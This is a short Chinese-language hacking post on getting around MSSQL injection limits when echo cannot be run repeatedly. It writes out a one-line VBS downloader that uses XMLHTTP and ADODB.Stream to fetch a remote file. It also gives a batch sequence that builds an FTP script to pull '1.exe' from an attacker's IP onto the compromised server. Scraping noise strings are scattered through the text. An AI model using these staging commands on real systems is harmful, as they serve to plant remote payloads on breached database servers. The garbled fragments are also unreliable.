mssql注射时不可以多次echo的解决办法

韩冰

<>解决办法:
1.iget.vbs一次写入
( ^: p/ L1 P: I  S在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写
8 N. I+ N/ {1 v$ T# K- O
Set x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2

4 Y1 S; J+ b4 K这样我们可以一次echo成功,echo版本:

echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 &gt;iget.vbs
& j; p0 N7 t8 f3 L: _5 u3 S
6 X% i6 K2 `  [/ H) M1 Q+ F% c
, n  ?" l3 U5 E" v2.bat调用ftp脚本的写法(by envymask)

echo ftp&gt;1.vbs
1 T0 g# y" n+ A$ Lecho open ip&gt;2.vbs
echo u&gt;3.vbs
echo s&gt;4.vbs
, j* i% p" d3 Y8 d* Cecho binary&gt;5.vbs
echo get 1.exe&gt;6.vbs
" ^: l! b" W7 x; G4 G7 Xecho bay&gt;7.vbs
2 w+ e( J$ D' p( o- k+ W2 K
copy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs+7.vbs new.vbs
</P>